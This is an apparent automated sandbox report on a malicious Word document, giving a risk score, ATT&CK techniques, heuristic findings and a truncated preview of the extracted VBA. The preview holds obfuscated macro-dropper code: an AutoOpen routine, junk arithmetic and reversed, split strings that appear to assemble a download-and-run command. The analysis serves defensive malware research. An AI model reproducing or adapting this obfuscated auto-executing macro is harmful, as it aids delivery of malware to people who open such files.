MALICIOUS
142
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
The sample is an OLE document containing VBA macros, including an AutoOpen macro and a Shell() call, indicating malicious intent. The AutoOpen macro likely executes a command to download and run a second-stage payload. The presence of these elements strongly suggests a macro-based malware delivery mechanism.
Heuristics 5
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 170021 bytes |
SHA-256: 49a0ef5708f101c047f47fbc3e51f0f5ba02b7225ff3853a4eec5cdbcc1d4c91 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "hpfHKjPXp"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub jGGwBE(VkNnQ)
QjJjYl = FbDhK
JRMEVM = (GBaRL / RaIEG / 38724 / Fix(kwwRzB)) + 48248 - CLng(oEDYn + CLng(42293)) + EJfsbC + 72605 * IrVTT - CStr(75072) / XwNRuL / CLng(uHTnu)
End Sub
Sub wXsXj(WzYOt)
zjpach = jrhHL
bkkOX = (nHTTl / zkzQww / 64901 / Fix(avcdU)) + 60147 - CLng(iNbOPh + CLng(2614)) + llkBp + 10502 * fPEbiz - CStr(14914) / tjZrv / CLng(IHtsmF)
sFVRwc = iNzrO
PMYsBp = (ziiqpF / dirIDA / 78892 / Fix(KjKhUw)) + 71883 - CLng(mhdDRv + CLng(65787)) + rziwK + 50956 * cqBhzV - CStr(78319) / OCbBpi / CLng(UiMCr)
LCKiw = QGVsdk
hrSOl = (ztOBp / sSYcAk / 15056 / Fix(WQorzD)) + 60234 - CLng(itKwR + CLng(72855)) + cCQas + 88706 * zAUnE - CStr(46877) / dUHVBj / CLng(CaOii)
End Sub
Sub LVrrcG(vZkJP)
HToWMz = fEYCc
EjabB = (NUDbJd / zGzDk / 95927 / Fix(NZwOE)) + 4661 - CLng(XvGzpO + CLng(25794)) + iVwiR + 4483 * ErfsB - CStr(3414) / hAnEW / CLng(fkLXz)
pZwdT = zvYbF
jDtVG = (LBjXNG / krLVz / 19167 / Fix(jHMvHO)) + 21641 - CLng(DFbGul + CLng(45672)) + JKicM + 96187 * RLqTjX - CStr(73496) / aRiSZ / CLng(zNsXiz)
End Sub
Sub Autoopen()
On Error Resume Next
wGLXMZ = LThOl
vjQucF = (fAoQT / bLzmEi / 1242 / Fix(VEivW)) + 96650 - CLng(OHkPjv + CLng(92054)) + wzvcf + 90440 * SvEOzq - CStr(27120) / dkkcZi / CLng(wFHhRt)
SAwhUtPwjfCHz (AmDjw + RcbHlVqOdnITo + oIBUG)
mirHA = AZGfvS
kKwpU = (dBNvRL / tNtUi / 30733 / Fix(zrDHw)) + 12894 - CLng(QUzVqk + CLng(18757)) + ppShW + 56028 * ZnZvj - CStr(99173) / jmwfzW / CLng(GrrNKN)
End Sub
Sub PaabHh(DBBts)
SQhCXo = nLZKmn
jwbTL = (qJMzU / RPckum / 10613 / Fix(aqKoqW)) + 68559 - CLng(EBPpUO + CLng(77906)) + ahhcl + 18191 * iiuWO - CStr(20734) / iYjstt / CLng(mcpjwE)
jfHDa = JMEdJ
mcGvz = (jdWrI / UvRoEr / 92573 / Fix(FswDnS)) + 77040 - CLng(QRTDic + CLng(12564)) + jhpLN + 50930 * sXfjfG - CStr(41983) / NhULu / CLng(DIhjwM)
XEtso = HXClb
DGjHjI = (vJGWNQ / icYIi / 32736 / Fix(jUSmq)) + 81219 - CLng(NkKws + CLng(63712)) + XXBwYP + 34335 * RhfbcX - CStr(60019) / tGKRUl / CLng(VsSjh)
End Sub
Sub vaVjV(FXKGC)
nDkGON = ilRphQ
mJfFF = (kWVHKs / MZcjA / 17164 / Fix(hhcPd)) + 9848 - CLng(wniln + CLng(37496)) + YvrEA + 36966 * QhdvW - CStr(12933) / IJhoY / CLng(oEhQbA)
End Sub
Attribute VB_Name = "mirVXYGnikf"
Sub pKQAz(Gwlpi)
wOYLUO = cAmYhq
Ywzdi = (CojkX / hzVBv / 93105 / Fix(uYIzv)) + 38006 - CLng(KCzCl + CLng(66991)) + ruIwH + 21429 * uIfon - CStr(29872) / dHwrcd / CLng(iPwEJO)
End Sub
Function RcbHlVqOdnITo()
On Error Resume Next
zojwo = qCMDnl
zQdLHE = (hvALIE / IiKtz / 93235 / Fix(vTwpzU)) + 81668 - CLng(vvDrjw + CLng(35692)) + nzFfjE + 77111 * pjjhX - CStr(3792) / qoEEw / CLng(VIjsGz)
Gzrkm = MNNPv
YpGwSr = (NbIPYD / GPEaKD / 80129 / Fix(jKYoin)) + 41379 - CLng(HbmvFR + CLng(97337)) + sdUqlw + 70269 * jwvwJ - CStr(75181) / sIwFv / CLng(dIwsm)
BcjTZmI = fOGhk("aO9+cC9efFG+cC9+cC9fFcC9+c'+'C9GnfFG(& = dscC9+cC9adasncC9+cC9kKWcC9((()cC9cC9niOj-cC9xcC9+]3,1[)(GNiRTSOt.eClm.h", 88298 + 5 - 88298, 88298 + 107 - 88298)
nmIip = Zihjz
laFIks = (fUWtn / LCFPU / 40600 / Fix(zzzhYQ)) + 11513 - CLng(kFYJIJ + CLng(38108)) + TVYGT + 13596 * QsUadO - CStr(38215) / MOApo / CLng(YjUmsv)
vlVIwL = ZJwjn
TUzZsp = (aERRX / DSSUsv / 31400 / Fix(tkJEsj)) + 3068 - CLng(kFzMj + CLng(24478)) + OQrtvT + 81923 * EkOHn - CStr(14516) / GkXmZj / CLng(VzIPKU)
vuKoEzVcJ = fOGhk("O0BcC9pcC'+'9+cC9xcC9+cC92cC9+cC9rtScC9+cC9oT7cC9+cC9DhcC9+cC9.cfsakcC9+cC9KcC9+cC9W(cC9+cC97ohfU", 29573 + 5 - 29573, 29573 + 90 - 29573)
SKwrZ = EACUZ
QETiZ = (JvzOo / nJZurl / 60877 / Fix(WIlZP)) + 30754 - CLng(DkFiC + CLng(23956)) + TjBVj + 3482 * YNDWB - CStr(7812) / iJJQp / CLng(jITtO)
bKUvYX = KIDCmH
jRGbzP = (XJKcMv / fZljw / 95830 / Fix(aWEZiw)) + 49731 - CLng(KWCSjs + CLng(37793)) + AczHE + 1372 * TLcUi - CStr(68326) / SpJLG / CLng(BCUTDi)
WHSbuuZbiM = fOGhk("7qZC9fFcC9+cC9G+cC9+cC9fc'+'C9+cC9FGx'+'e.fFG(
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.